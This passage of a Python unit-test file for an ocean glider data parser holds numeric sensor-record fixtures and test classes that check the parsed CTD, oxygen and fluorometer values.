1 260 0.7 0 -1 260 -1 -1 4.96727 -1 0.4528 -1 4330 -12600 0 -1 1 1 2 2.44548 12.9695 -0.219681 1 0 1 0 1329843706.03265 1196.2 0 0 -0.183911 0.00699798 0.166781 155.923 0.379813 0.55692 124.082 4971.02 0 0 0 10.6873 10.7871 0.703717 0.141578 0 0 0 1 59 1 1 -1 0 1 1 40.9937 -9944 303.803 0.485094 -1634 0 0.258982 0 0.00472497 0 0 0.00136254 0 0 0.258982 8 6 21 6 259.77 1.43611 0 0 0 1022 6 0 4194300 1781.12 219.812 48926.2 -1 -1 -1 -1 0 0 -1 0 0 0 0 0 0 0 0 43.0556 0 -0.0616963 -0.144984 0 0 0 0 0 304128 0.916352 0 0 0 1.7942 4328.2816 -12523.8141 4328.2925 -12523.8189 4328.2683 -12523.7965 -0.279253 11 0 0 0 0.308667 0 4328.6173 -12513.3557 0.9 21 18 3 2 35 12 40389 -1904.23 0.0197767 0.11338 0.120462 -0.0173492 5.05447 -0.0616291 -0.145094 0 518 1 0 3323 0 0 5 99 0 0 0 0 0 0 0 0 0 0 4756.23 4328.26830007145 0 2.46526 2.45955 0 57.8052 0 0 0 -12523.7965000589 289792 270336 0.430413 0.350943 1329849569 0 0.518363 102687000 -0.0426476 0 1329849569.26294 0.0258982 0 0 0.137179 16.967 1 -0.10821 32.0756 0 0 1371 1329849561.95532 1 284672 0.348396 1 0 1 0 0 7.58463e-23 1 2 1 0 -1 0 0 0 -1 -1 -1 -1 0 0 0 0 0 3 2 -172433 0.74206 605.857 3115 5.06637 10.0444 0 0 13.1124 -0.283741 0.300996 -0.0683846 3 -0.0218157 0.0107268 -1 49.141 10 -0.0616963 -0.144984 16 40389 -1904.23 4330 -12600 -12 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 1000.1 1000.1 NaN NaN NaN 1000.1 1000.1 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 1000.1
1 260 0.7 0 -1 260 -1 -1 4.96727 -1 0.4528 -1 4330 -12600 0 -1 1 1 2 2.44548 12.9695 -0.219681 1 0 1 0 1329843706.03265 1196.2 0 0 -0.183911 0.00699798 0.166781 155.923 0.379813 0.55692 124.082 4971.02 0 0 0 10.6806 10.6208 0.695632 0.141578 0 0 0 1 59 1 1 -1 0 1 1 40.9972 -9947 303.806 0.0955938 -322 1 0.148777 0 0.00472497 0 0 0.00136254 0 0 0.258982 3 6 21 6 259.742 1.43605 0 0 0 1023 3 0 4194310 1781.12 219.812 48926.2 -1 -1 -1 -1 0 0 -1 0 0 0 0 0 0 0 0 43.0556 0.0127162 -0.0616963 -0.144984 0 0 0 0 0 324608 0.916352 0 0 7 1.7942 4328.2816 -12523.8141 4328.2925 -12523.8189 4328.2683 -12523.7965 -0.279253 11 1 0 0 0.308667 0 4328.6173 -12513.3557 0.9 21 18 3 2 35 12 40389 -1904.23 0.0197767 0.11338 0.120462 -0.0173492 5.05447 -0.0616291 -0.145094 0 518 0 0 3323 0 0 5 99 0 0 0 0 0 0 0 0 0 0 4756.23 4328.26830007145 0 2.46386 2.45876 0 57.8047 0 0 0 -12523.7965000589 289792 270336 0.430413 0.350943 1329849569 0 0.518363 115832000 -0.0426476 49.646 1329849618.79962 0.0148777 0 0 0.137057 16.967 1 -0.10821 32.0756 1 0 59 1329849561.95532 1 283648 0.348396 0 0 1 0 0 6.63787e-23 0.875173 1.87517 1 0 -1 0 0 0 -1 -1 -1 -1 0 0 0 0 0 3 2 -172433 0.74206 605.857 3115 5.06637 7.84544 0 0 13.1954 -0.283741 0 0 3 -0.0218157 0.0107268 -1 49.141 10 -0.0616963 -0.144984 16 0 0 4330 -12600 -12 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 1000.2 1000.2 NaN NaN NaN 1000.2 1000.2 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 1000.1 """
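# ENGSCI_RECORD_69: the same rows with the GPS fields replaced by 69696969 sentinel values.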
ENGSCI_RECORD_69 = """
1 260 0.7 0 -1 260 -1 -1 4.96727 -1 0.4528 -1 4330 -12600 0 -1 1 1 2 2.44548 12.9695 -0.219681 1 0 1 0 1329843706.03265 1196.2 0 0 -0.183911 0.00699798 0.166781 155.923 0.379813 0.55692 124.082 4971.02 0 0 0 10.6873 10.7871 0.703717 0.141578 0 0 0 1 59 1 1 -1 0 1 1 40.9937 -9944 303.803 0.485094 -1634 0 0.258982 0 0.00472497 0 0 0.00136254 0 0 0.258982 8 6 21 6 259.77 1.43611 0 0 0 1022 6 0 4194300 1781.12 219.812 48926.2 -1 -1 -1 -1 0 0 -1 0 0 0 0 0 0 0 0 43.0556 0 -0.0616963 -0.144984 0 0 0 0 0 304128 0.916352 0 0 0 1.7942 4328.2816 -12523.8141 4328.2925 -12523.8189 69696969 69696969 -0.279253 11 0 0 0 0.308667 0 4328.6173 -12513.3557 0.9 21 18 3 2 35 12 40389 -1904.23 0.0197767 0.11338 0.120462 -0.0173492 5.05447 -0.0616291 -0.145094 0 518 1 0 3323 0 0 5 99 0 0 0 0 0 0 0 0 0 0 4756.23 696969690007145 0 2.46526 2.45955 0 57.8052 0 0 0 69696969000589 289792 270336 0.430413 0.350943 1329849569 0 0.518363 102687000 -0.0426476 0 1329849569.26294 0.0258982 0 0 0.137179 16.967 1 -0.10821 32.0756 0 0 1371 1329849561.95532 1 284672 0.348396 1 0 1 0 0 7.58463e-23 1 2 1 0 -1 0 0 0 -1 -1 -1 -1 0 0 0 0 0 3 2 -172433 0.74206 605.857 3115 5.06637 10.0444 0 0 13.1124 -0.283741 0.300996 -0.0683846 3 -0.0218157 0.0107268 -1 49.141 10 -0.0616963 -0.144984 16 40389 -1904.23 4330 -12600 -12 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 1000.1 1000.1 NaN NaN NaN 1000.1 1000.1 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 1000.1
1 260 0.7 0 -1 260 -1 -1 4.96727 -1 0.4528 -1 4330 -12600 0 -1 1 1 2 2.44548 12.9695 -0.219681 1 0 1 0 1329843706.03265 1196.2 0 0 -0.183911 0.00699798 0.166781 155.923 0.379813 0.55692 124.082 4971.02 0 0 0 10.6806 10.6208 0.695632 0.141578 0 0 0 1 59 1 1 -1 0 1 1 40.9972 -9947 303.806 0.0955938 -322 1 0.148777 0 0.00472497 0 0 0.00136254 0 0 0.258982 3 6 21 6 259.742 1.43605 0 0 0 1023 3 0 4194310 1781.12 219.812 48926.2 -1 -1 -1 -1 0 0 -1 0 0 0 0 0 0 0 0 43.0556 0.0127162 -0.0616963 -0.144984 0 0 0 0 0 324608 0.916352 0 0 7 1.7942 4328.2816 -12523.8141 4328.2925 -12523.8189 69696969 69696969 -0.279253 11 1 0 0 0.308667 0 4328.6173 -12513.3557 0.9 21 18 3 2 35 12 40389 -1904.23 0.0197767 0.11338 0.120462 -0.0173492 5.05447 -0.0616291 -0.145094 0 518 0 0 3323 0 0 5 99 0 0 0 0 0 0 0 0 0 0 4756.23 696969690007145 0 2.46386 2.45876 0 57.8047 0 0 0 69696969000589 289792 270336 0.430413 0.350943 1329849569 0 0.518363 115832000 -0.0426476 49.646 1329849618.79962 0.0148777 0 0 0.137057 16.967 1 -0.10821 32.0756 1 0 59 1329849561.95532 1 283648 0.348396 0 0 1 0 0 6.63787e-23 0.875173 1.87517 1 0 -1 0 0 0 -1 -1 -1 -1 0 0 0 0 0 3 2 -172433 0.74206 605.857 3115 5.06637 7.84544 0 0 13.1954 -0.283741 0 0 3 -0.0218157 0.0107268 -1 49.141 10 -0.0616963 -0.144984 16 0 0 4330 -12600 -12 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 1000.2 1000.2 NaN NaN NaN 1000.2 1000.2 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 1000.1 """
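# ENGSCI_BAD_LAT_RECORD: the first row carries a non-numeric latitude ("433X"), the second a bare integer latitude ("30").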
ENGSCI_BAD_LAT_RECORD = """
1 260 0.7 0 -1 260 -1 -1 4.96727 -1 0.4528 -1 433X -12600 0 -1 1 1 2 2.44548 12.9695 -0.219681 1 0 1 0 1329843706.03265 1196.2 0 0 -0.183911 0.00699798 0.166781 155.923 0.379813 0.55692 124.082 4971.02 0 0 0 10.6873 10.7871 0.703717 0.141578 0 0 0 1 59 1 1 -1 0 1 1 40.9937 -9944 303.803 0.485094 -1634 0 0.258982 0 0.00472497 0 0 0.00136254 0 0 0.258982 8 6 21 6 259.77 1.43611 0 0 0 1022 6 0 4194300 1781.12 219.812 48926.2 -1 -1 -1 -1 0 0 -1 0 0 0 0 0 0 0 0 43.0556 0 -0.0616963 -0.144984 0 0 0 0 0 304128 0.916352 0 0 0 1.7942 4328.2816 -12523.8141 4328.2925 -12523.8189 4328.2683 -12523.7965 -0.279253 11 0 0 0 0.308667 0 4328.6173 -12513.3557 0.9 21 18 3 2 35 12 40389 -1904.23 0.0197767 0.11338 0.120462 -0.0173492 5.05447 -0.0616291 -0.145094 0 518 1 0 3323 0 0 5 99 0 0 0 0 0 0 0 0 0 0 4756.23 4328.26830007145 0 2.46526 2.45955 0 57.8052 0 0 0 -12523.7965000589 289792 270336 0.430413 0.350943 1329849569 0 0.518363 102687000 -0.0426476 0 1329849569.26294 0.0258982 0 0 0.137179 16.967 1 -0.10821 32.0756 0 0 1371 1329849561.95532 1 284672 0.348396 1 0 1 0 0 7.58463e-23 1 2 1 0 -1 0 0 0 -1 -1 -1 -1 0 0 0 0 0 3 2 -172433 0.74206 605.857 3115 5.06637 10.0444 0 0 13.1124 -0.283741 0.300996 -0.0683846 3 -0.0218157 0.0107268 -1 49.141 10 -0.0616963 -0.144984 16 40389 -1904.23 4330 -12600 -12 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 1000.1 1000.1 NaN NaN NaN 1000.1 1000.1 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 1000.1
1 260 0.7 0 -1 260 -1 -1 4.96727 -1 0.4528 -1 30 -12600 0 -1 1 1 2 2.44548 12.9695 -0.219681 1 0 1 0 1329843706.03265 1196.2 0 0 -0.183911 0.00699798 0.166781 155.923 0.379813 0.55692 124.082 4971.02 0 0 0 10.6806 10.6208 0.695632 0.141578 0 0 0 1 59 1 1 -1 0 1 1 40.9972 -9947 303.806 0.0955938 -322 1 0.148777 0 0.00472497 0 0 0.00136254 0 0 0.258982 3 6 21 6 259.742 1.43605 0 0 0 1023 3 0 4194310 1781.12 219.812 48926.2 -1 -1 -1 -1 0 0 -1 0 0 0 0 0 0 0 0 43.0556 0.0127162 -0.0616963 -0.144984 0 0 0 0 0 324608 0.916352 0 0 7 1.7942 4328.2816 -12523.8141 4328.2925 -12523.8189 4328.2683 -12523.7965 -0.279253 11 1 0 0 0.308667 0 4328.6173 -12513.3557 0.9 21 18 3 2 35 12 40389 -1904.23 0.0197767 0.11338 0.120462 -0.0173492 5.05447 -0.0616291 -0.145094 0 518 0 0 3323 0 0 5 99 0 0 0 0 0 0 0 0 0 0 4756.23 4328.26830007145 0 2.46386 2.45876 0 57.8047 0 0 0 -12523.7965000589 289792 270336 0.430413 0.350943 1329849569 0 0.518363 115832000 -0.0426476 49.646 1329849618.79962 0.0148777 0 0 0.137057 16.967 1 -0.10821 32.0756 1 0 59 1329849561.95532 1 283648 0.348396 0 0 1 0 0 6.63787e-23 0.875173 1.87517 1 0 -1 0 0 0 -1 -1 -1 -1 0 0 0 0 0 3 2 -172433 0.74206 605.857 3115 5.06637 7.84544 0 0 13.1954 -0.283741 0 0 3 -0.0218157 0.0107268 -1 49.141 10 -0.0616963 -0.144984 16 0 0 4330 -12600 -12 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 1000.2 1000.2 NaN NaN NaN 1000.2 1000.2 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 1000.1 """
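# FLORT_RECORD: two rows matching HEADER3 with the sci_flbbcd_* readings populated.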
FLORT_RECORD = """
NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 153.928 1329849722.92795 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 664.424 0.401911 10.572 10.25 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 700 139 0.000281336 460 72 2.0352 695 114 0.8349 NaN 560 NaN NaN NaN NaN NaN NaN 153.928 1329849722.92795 NaN NaN NaN 266.42 93.49 9.48 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN
NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 154.944 1329849723.94394 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 645.569 0.390792 10.572 10.25 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 892 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 700 133 0.000262988 460 73 2.12 695 115 0.847 NaN 559 NaN NaN NaN NaN NaN NaN 154.944 1329849723.94394 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN """
FLORT_O_RECORD = """
NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 1783.96 1439822650.9566 NaN NaN NaN NaN 70 101 169 550 77399.4 4004 134 2903 1783.96 1439822650.9566 261.501 93.736 10.508 0.0795487 5.67933 0 -2e-05 0 11.1774
NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 221.447 1439822869.44687 NaN NaN NaN NaN 148 217 4047 556 738528000 280 60 95 221.447 1439822869.44687 NaN NaN NaN NaN NaN NaN NaN NaN NaN """
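# Edge-case fixtures below: an all-NaN row plus rows whose only value is a zero or bare-integer GPS reading; none should yield particles.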
EMPTY_RECORD = """
NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN """
ZERO_GPS_VALUE = """
NaN 0 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN """
INT_GPS_VALUE = """
NaN 2012 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN """
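# CTDGV_RECORD and DOSTA_RECORD: two-row fixtures carrying conductivity/pressure/temperature and oxygen/saturation readings, respectively.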
CTDGV_RECORD = """
NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 121147 1378349241.82962 NaN NaN NaN NaN NaN NaN 121147 1378349241.82962 NaN NaN 4.03096 0.021 15.3683
NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 121207 1378349302.10907 NaN NaN NaN NaN NaN NaN 121207 1378349302.10907 NaN NaN 4.03113 0.093 15.3703 """
DOSTA_RECORD = """
NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 121144 1378349238.77789 NaN NaN NaN NaN NaN NaN 121144 1378349238.77789 242.217 96.009 NaN NaN NaN
NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 121204 1378349299.09106 NaN NaN NaN NaN NaN NaN 121204 1378349299.09106 242.141 95.988 NaN NaN NaN """
ENG_RECORD = """
0.273273 NaN NaN 0.335 149.608 0.114297 33.9352 -64.3506 NaN NaN NaN 5011.38113678061 -14433.5809717525 NaN 121546 1378349641.79871 NaN NaN NaN 0 NaN NaN NaN NaN NaN NaN NaN NaN NaN
NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN 1.23569 NaN NaN -0.0820305 121379 1378349475.09927 0.236869 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN """
@attr('UNIT', group='mi')
class GliderParserUnitTestCase(ParserUnitTestCase):
"""
Glider Parser unit test base class and common tests.
"""
config = {}
def set_data(self, *args):
"""
Accept strings of data in args[] joined together and then a file handle
to the concatenated string is returned.
"""
io = StringIO()
for data in args:
io.write(data)
# log.debug("Test data file: %s", io.getvalue())
io.seek(0)
self.test_data = io
def assert_no_more_data(self):
"""
Verify we don't find any other records in the data file.
"""
records = self.parser.get_records(1)
self.assertEqual(len(records), 0)
def assert_generate_particle(self, particle_type, values_dict=None):
"""
Verify that we can generate a particle of the correct type.
@param values_dict key value pairs to test in the particle.
"""
records = self.parser.get_records(1)
self.assertIsNotNone(records)
self.assertIsInstance(records, list)
self.assertEqual(len(records), 1)
self.assert_type(records, particle_type)
# Verify the data
if values_dict:
self.assert_particle_values(records[0], values_dict)
return records
def assert_particle_values(self, particle, expected_values):
"""
Verify that every value in expected_values appears in the particle.
"""
data_dict = particle.generate_dict()
log.debug("Data in particle: %s", data_dict)
log.debug("Expected Data: %s", expected_values)
# Fail loudly if an expected value_id is missing, instead of silently passing.
for key, expected in expected_values.items():
matches = [value for value in data_dict['values'] if value['value_id'] == key]
self.assertTrue(matches, "value_id %s not found in particle" % key)
for value in matches:
self.assertEqual(value['value'], expected)
def assert_type(self, records, particle_class):
for particle in records:
str_of_type = particle.data_particle_type()
self.assertEqual(particle_class._data_particle_type, str_of_type)
@attr('UNIT', group='mi')
class CtdgvTelemeteredGliderTest(GliderParserUnitTestCase):
"""
Test cases for ctdgv glider data
"""
config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.glider',
DataSetDriverConfigKeys.PARTICLE_CLASS: 'CtdgvTelemeteredDataParticle'
}
def test_ctdgv_telemetered_particle(self):
"""
Verify the parser publishes the expected particles from the test data.
"""
self.set_data(HEADER, CTDGV_RECORD)
self.parser = GliderParser(self.config, self.test_data, self.exception_callback)
record_1 = {CtdgvParticleKey.SCI_WATER_TEMP: 15.3683, CtdgvParticleKey.SCI_WATER_COND: 4.03096,
CtdgvParticleKey.SCI_WATER_PRESSURE: 0.021}
record_2 = {CtdgvParticleKey.SCI_WATER_TEMP: 15.3703, CtdgvParticleKey.SCI_WATER_COND: 4.03113,
CtdgvParticleKey.SCI_WATER_PRESSURE: 0.093}
self.assert_generate_particle(CtdgvTelemeteredDataParticle, record_1)
self.assert_generate_particle(CtdgvTelemeteredDataParticle, record_2)
self.assert_no_more_data()
def test_gps(self):
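"""
Verify that rows containing only a zero or bare-integer GPS value
produce no particles.
"""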
self.set_data(HEADER, ZERO_GPS_VALUE)
self.parser = GliderParser(self.config, self.test_data, self.exception_callback)
records = self.parser.get_records(1)
self.assertEqual(len(records), 0)
self.set_data(HEADER, INT_GPS_VALUE)
self.parser = GliderParser(self.config, self.test_data, self.exception_callback)
records = self.parser.get_records(1)
self.assertEqual(len(records), 0)
def test_single_yml(self):
"""
Test with a yml file with a single record
"""
with open(os.path.join(CTDGV_RESOURCE_PATH, 'single_ctdgv_record.mrg'), 'rU') as file_handle:
parser = GliderParser(self.config, file_handle, self.exception_callback)
record = parser.get_records(1)
self.assert_particles(record, 'single_ctdgv_record.mrg.result.yml', CTDGV_RESOURCE_PATH)
self.assertEqual(self.exception_callback_value, [])
def test_multiple_yml(self):
"""
Test with a yml file with multiple records
"""
with open(os.path.join(CTDGV_RESOURCE_PATH, 'multiple_ctdgv_record.mrg'), 'rU') as file_handle:
parser = GliderParser(self.config, file_handle, self.exception_callback)
record = parser.get_records(4)
self.assert_particles(record, 'multiple_ctdgv_record.mrg.result.yml', CTDGV_RESOURCE_PATH)
self.assertEqual(self.exception_callback_value, [])
def test_real(self):
"""
Test with several real files and confirm no exceptions occur
"""
with open(os.path.join(CTDGV_RESOURCE_PATH, 'unit_363_2013_199_0_0.mrg'), 'rU') as file_handle:
parser = GliderParser(self.config, file_handle, self.exception_callback)
records = parser.get_records(1107)
self.assertTrue(len(records) > 0)
self.assertEqual(self.exception_callback_value, [])
with open(os.path.join(CTDGV_RESOURCE_PATH, 'unit_363_2013_199_5_0.mrg'), 'rU') as file_handle:
parser = GliderParser(self.config, file_handle, self.exception_callback)
records = parser.get_records(108)
self.assertTrue(len(records) > 0)
self.assertEqual(self.exception_callback_value, [])
with open(os.path.join(CTDGV_RESOURCE_PATH, 'unit_363_2013_245_6_6.mrg'), 'rU') as file_handle:
parser = GliderParser(self.config, file_handle, self.exception_callback)
records = parser.get_records(240)
self.assertTrue(len(records) > 0)
self.assertEqual(self.exception_callback_value, [])
with open(os.path.join(CTDGV_RESOURCE_PATH, 'unit_364_2013_192_1_0.mrg'), 'rU') as file_handle:
parser = GliderParser(self.config, file_handle, self.exception_callback)
records = parser.get_records(4)
self.assertTrue(len(records) > 0)
self.assertEqual(self.exception_callback_value, [])
@attr('UNIT', group='mi')
class CtdgvRecoveredGliderTest(GliderParserUnitTestCase):
"""
Test cases for ctdgv glider data
"""
config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.glider',
DataSetDriverConfigKeys.PARTICLE_CLASS: 'CtdgvRecoveredDataParticle'
}
def test_ctdgv_recovered_particle(self):
"""
Verify the parser publishes the expected particles from the test data.
"""
self.set_data(HEADER, CTDGV_RECORD)
self.parser = GliderParser(self.config, self.test_data, self.exception_callback)
record_1 = {CtdgvParticleKey.SCI_WATER_TEMP: 15.3683, CtdgvParticleKey.SCI_WATER_COND: 4.03096,
CtdgvParticleKey.SCI_WATER_PRESSURE: 0.021}
record_2 = {CtdgvParticleKey.SCI_WATER_TEMP: 15.3703, CtdgvParticleKey.SCI_WATER_COND: 4.03113,
CtdgvParticleKey.SCI_WATER_PRESSURE: 0.093}
self.assert_generate_particle(CtdgvRecoveredDataParticle, record_1)
self.assert_generate_particle(CtdgvRecoveredDataParticle, record_2)
self.assert_no_more_data()
def test_gps(self):
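"""
Verify that rows containing only a zero or bare-integer GPS value
produce no particles.
"""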
self.set_data(HEADER, ZERO_GPS_VALUE)
self.parser = GliderParser(self.config, self.test_data, self.exception_callback)
records = self.parser.get_records(1)
self.assertEqual(len(records), 0)
self.set_data(HEADER, INT_GPS_VALUE)
self.parser = GliderParser(self.config, self.test_data, self.exception_callback)
records = self.parser.get_records(1)
self.assertEqual(len(records), 0)
@attr('UNIT', group='mi')
class DOSTATelemeteredGliderTest(GliderParserUnitTestCase):
"""
Test cases for dosta glider data
"""
config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.glider',
DataSetDriverConfigKeys.PARTICLE_CLASS: 'DostaTelemeteredDataParticle'
}
def test_dosta_telemetered_particle(self):
"""
Verify the parser publishes the expected particles from the test data.
"""
self.set_data(HEADER, DOSTA_RECORD)
self.parser = GliderParser(self.config, self.test_data, self.exception_callback)
record_1 = {DostaTelemeteredParticleKey.SCI_OXY4_OXYGEN: 242.217,
DostaTelemeteredParticleKey.SCI_OXY4_SATURATION: 96.009}
record_2 = {DostaTelemeteredParticleKey.SCI_OXY4_OXYGEN: 242.141,
DostaTelemeteredParticleKey.SCI_OXY4_SATURATION: 95.988}
self.assert_generate_particle(DostaTelemeteredDataParticle, record_1)
self.assert_generate_particle(DostaTelemeteredDataParticle, record_2)
self.assert_no_more_data()
def test_multiple_yml(self):
"""
Test with a yml file with multiple records
"""
with open(os.path.join(DOSTA_RESOURCE_PATH, 'multiple_dosta_record.mrg'), 'rU') as file_handle:
parser = GliderParser(self.config, file_handle, self.exception_callback)
record = parser.get_records(4)
self.assert_particles(record, 'multiple_dosta_record.mrg.result.yml', DOSTA_RESOURCE_PATH)
self.assertEqual(self.exception_callback_value, [])
def test_real(self):
"""
Test with a real file and confirm no exceptions occur
"""
with open(os.path.join(DOSTA_RESOURCE_PATH, 'unit_363_2013_245_6_6.mrg'), 'rU') as file_handle:
parser = GliderParser(self.config, file_handle, self.exception_callback)
records = parser.get_records(240)
self.assertTrue(len(records) > 0)
self.assertEqual(self.exception_callback_value, [])
@attr('UNIT', group='mi')
class DOSTARecoveredGliderTest(GliderParserUnitTestCase):
"""
Test cases for recovered dosta glider data
"""
config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.glider',
DataSetDriverConfigKeys.PARTICLE_CLASS: 'DostaRecoveredDataParticle'
}
def test_dosta_recovered_particle(self):
"""
Verify the parser publishes the expected particles from the test data.
"""
self.set_data(HEADER, DOSTA_RECORD)
self.parser = GliderParser(self.config, self.test_data, self.exception_callback)
record_1 = {DostaRecoveredParticleKey.SCI_OXY4_OXYGEN: 242.217,
